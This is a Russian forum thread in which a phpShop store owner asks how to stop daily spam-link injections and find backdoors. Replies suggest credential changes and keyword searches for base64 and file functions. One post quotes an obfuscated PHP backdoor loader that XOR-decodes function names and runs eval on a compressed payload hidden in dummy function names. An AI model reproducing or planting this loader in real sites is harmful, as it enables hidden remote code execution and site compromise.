phpShop

Тема в разделе "Интернет-магазины", создана пользователем Savok32, 29 окт 2013.

  1. Savok32

    Savok32

    Регистрация:
    18 дек 2012
    Сообщения:
    331
    Симпатии:
    51
    История такая, есть магазин phpShop и каждый день в описания или в титул лезут ссылки с порно ресурсами и так далее.... как можно избавится от этой проблемы? как их быстро выявлять? расскажите кто сталкивался с таким?
     
  2. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.350
    Симпатии:
    1.378
    Нужно проверять код на бэкдоры, скорее всего (вероятность 90%) что тебя взломали. Или ты сразу установил скрипт с чужими правками.
     
  3. Savok32

    Savok32

    Регистрация:
    18 дек 2012
    Сообщения:
    331
    Симпатии:
    51
    мне просто этот магазин передали, по работе, да и доступ на фтп много кто знает. Мои действия поменять пароль на фтп и проверить на бэкдоры? И да как это сделать можно? проверить? Как эти проги называются?
     
  4. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.350
    Симпатии:
    1.378
    да, поменять логин, пароль.
    просканить например, этим: http://wmasteru.org/threads/2880/
    если ничего не даст, поискать на наличие base64_*, file_get_content, file_put_content и т.д.
     
    Savok32 нравится это.
  5. Savok32

    Savok32

    Регистрация:
    18 дек 2012
    Сообщения:
    331
    Симпатии:
    51
    тобишь я заливай весь сайт на локалк, и допустим через тотал командер ищу во всех файлах запросы base64 потом ile_get_content, и так далее?
    И наверно еще можно файл базы SQL посканить по запросам например "porno" ?
     
  6. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.350
    Симпатии:
    1.378
    Да.
    Если в у тебя есть записи с ненужными текстами.
     
  7. Savok32

    Savok32

    Регистрация:
    18 дек 2012
    Сообщения:
    331
    Симпатии:
    51
    и так проверил через поиск файлы на base64 потом ile_get_content, таких страниц около 300 нашлось....проверил sql базу на ссылки левые....там их более 1к...... как действовать в таких ситуациях?
     
  8. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.350
    Симпатии:
    1.378
    Смотреть что они делают :Smile: Может движок так работает. base64 раскодировать.
    Руками - это будет адово :Smile:
    Запросом или процедурой вычищать.
     
  9. Savok32

    Savok32

    Регистрация:
    18 дек 2012
    Сообщения:
    331
    Симпатии:
    51
    PHP:
    function yf13015c323a4235b0889254(){}
    function 
    yf13015c8b7a8eef77f0f8db(){}
    .
    .
    тут function таких одинаковых идет штук 100
    .
    .
    function 
    yf13015cc1424590ad55f2ea(){}
    function 
    yf13015cfcbf(){}
    $uf16cd=w13dda(array(117,113,108,112,115,120,121));
    $g121b3fa=w13dda(array(125,110,110,125,101,67,122,117,112,104,121,110));
    $mf7737=w13dda(array(111,105,126,111,104,110));
    $ubeb9c=w13dda(array(121,106,125,112));
    $a9e1f8=w13dda(array(123,102,117,114,122,112,125,104,121));
    $ic8a9b=w13dda(array(108,125,127,119));
    $a4febd=w13dda(array(123,121,104,67,120,121,122,117,114,121,120,67,122,105,114,127,104,117,115,114,111));$c70bda=$a4febd();
    $qd89=null;$c70bda=$g121b3fa($c70bda[w13dda(array(105,111,121,110))], w13dda(array(123,46,127,36,41,121)));
    $wef9 = array(); foreach($c70bda as $f){$wef9[] = $mf7737($f,8);};
    eval(
    $a9e1f8($ic8a9b(w13dda(array(84,54)),$uf16cd($qd89,$wef9))));
    function 
    w13dda($o2ae){global $qd89$ret $qd89;for($i=0$i count($o2ae); $i++)$ret.=chr($o2ae[$i]) ^ chr(28);return $ret;}
    function 
    g2c85e($o2ae){global $mf7737; return ($mf7737($o2ae,0,8)== w13dda(array(101,122,45,47,44,45,41,127)));}
    вам не кажется, что больно подозрительный код?
     
  10. serval04

    serval04

    Регистрация:
    9 сен 2013
    Сообщения:
    16
    Симпатии:
    5
    Чаще всего дублируется один код. Ты скинул нам просто массив, и по нему судить сложно.
    Распиши:
    1. Что за версия?
    2. Какие изменения проводились?
    3. Несколько отрывков base64 и ile_get_content.
    4. Где именно в базе ссылки. Возможно достаточно одного или нескольких sql-запросов для чистки базы.
     
  11. Savok32

    Savok32

    Регистрация:
    18 дек 2012
    Сообщения:
    331
    Симпатии:
    51
    1 PHPShop 2.1.95.1.0 Enterprise
    2 Да много чего с ним делали это точно, но что именно я не в курсах.
    3 там этих файлов с этими кодами больше 200
    4 Ссылки спамятся в категории в их описание, в новости, в статьи, в заголовки новостей (скрытые),